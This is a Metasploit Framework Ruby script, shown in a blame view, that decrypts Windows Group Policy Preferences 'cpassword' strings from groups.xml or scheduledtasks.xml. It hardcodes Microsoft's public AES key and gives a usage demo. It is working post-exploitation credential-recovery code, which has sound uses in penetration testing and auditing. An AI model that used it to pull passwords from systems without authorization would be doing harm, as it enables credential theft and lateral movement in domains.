2013-12-19 18:10:00 +00:00
|
|
|
#!/usr/bin/env ruby
|
|
|
|
|
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-12-19 18:10:00 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
#
|
|
|
|
# This script will allow you to specify an encrypted cpassword string using the Microsofts public
|
|
|
|
# AES key. This is useful if you don't or can't use the GPP post exploitation module. Just paste
|
|
|
|
# the cpassword encrypted string found in groups.xml or scheduledtasks.xml and it will output the
|
|
|
|
# decrypted string for you.
|
|
|
|
#
|
|
|
|
# Tested Windows Server 2008 R2 Domain Controller.
|
|
|
|
#
|
|
|
|
# Authors:
|
|
|
|
# Ben Campbell <eat_meatballs[at]hotmail.co.uk>
|
|
|
|
# Loic Jaquemet <loic.jaquemet+msf[at]gmail.com>
|
|
|
|
# scriptmonkey <scriptmonkey[at]owobble.co.uk>
|
|
|
|
# theLightCosine
|
|
|
|
# mubix (domain/dc enumeration code)
|
|
|
|
# David Kennedy "ReL1K" <kennedyd013[at]gmail.com>
|
|
|
|
#
|
|
|
|
# References:
|
|
|
|
# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
|
|
|
|
# http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)
|
|
|
|
# http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
|
|
|
|
# http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx
|
|
|
|
#
|
|
|
|
# Demo:
|
|
|
|
# $ ./cpassword_decrypt.rb AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk
|
|
|
|
# [+] The decrypted AES password is: testpassword
|
|
|
|
#
|
|
|
|
|
|
|
|
msfbase = __FILE__
|
|
|
|
while File.symlink?(msfbase)
|
|
|
|
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
|
|
|
|
end
|
|
|
|
|
2015-10-06 15:30:52 +00:00
|
|
|
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib')))
|
2016-07-05 07:33:45 +00:00
|
|
|
|
|
|
|
gem 'rex-text'
|
|
|
|
|
2013-12-19 18:10:00 +00:00
|
|
|
require 'msfenv'
|
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
class CPassword
|
|
|
|
|
|
|
|
#
|
|
|
|
# Decrypts the AES-encrypted cpassword string
|
|
|
|
# @param encrypted_data [String] The encrypted cpassword
|
|
|
|
# @return [String] The decrypted string in ASCII
|
|
|
|
#
|
|
|
|
def decrypt(encrypted_data)
|
|
|
|
# Prepare the password for the decoder
|
|
|
|
padding = "=" * (4 - (encrypted_data.length % 4))
|
|
|
|
epassword = "#{encrypted_data}#{padding}"
|
|
|
|
|
|
|
|
# Decode the string using Base64
|
|
|
|
decoded = Rex::Text.decode_base64(epassword)
|
|
|
|
|
|
|
|
# Decryption
|
|
|
|
key = ''
|
|
|
|
key << "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc"
|
|
|
|
key << "\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
|
|
|
|
begin
|
2017-01-17 20:44:45 +00:00
|
|
|
aes = OpenSSL::Cipher.new("AES-256-CBC")
|
2013-12-19 18:10:00 +00:00
|
|
|
aes.decrypt
|
|
|
|
aes.key = key
|
|
|
|
plaintext = aes.update(decoded)
|
|
|
|
plaintext << aes.final
|
|
|
|
rescue OpenSSL::Cipher::CipherError
|
|
|
|
# Decryption failed possibily due to bad input
|
|
|
|
return ''
|
|
|
|
end
|
|
|
|
|
|
|
|
# Converts the string to ASCII
|
|
|
|
Rex::Text.to_ascii(plaintext)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Shows script usage
|
|
|
|
#
|
|
|
|
def usage
|
|
|
|
print_status("Usage: #{__FILE__} [The encrypted cpassword string]")
|
|
|
|
exit
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Prints a status message
|
|
|
|
#
|
|
|
|
def print_status(msg='')
|
|
|
|
$stderr.puts "[*] #{msg}"
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Prints an error message
|
|
|
|
#
|
|
|
|
def print_error(msg='')
|
|
|
|
$stderr.puts "[-] #{msg}"
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Prints a good message
|
|
|
|
#
|
|
|
|
def print_good(msg='')
|
|
|
|
$stderr.puts "[+] #{msg}"
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# main
|
|
|
|
#
|
|
|
|
if __FILE__ == $PROGRAM_NAME
|
|
|
|
pass = ARGV.shift
|
|
|
|
|
|
|
|
# Input check
|
|
|
|
usage if pass.nil? or pass.empty?
|
|
|
|
|
|
|
|
cpasswd = CPassword.new
|
|
|
|
pass = cpasswd.decrypt(pass)
|
|
|
|
|
|
|
|
if pass.empty?
|
|
|
|
print_error("Nothing was decrypted, please check your input.")
|
|
|
|
else
|
|
|
|
print_good("The decrypted AES password is: #{pass}")
|
|
|
|
end
|
2016-07-05 07:33:45 +00:00
|
|
|
end
|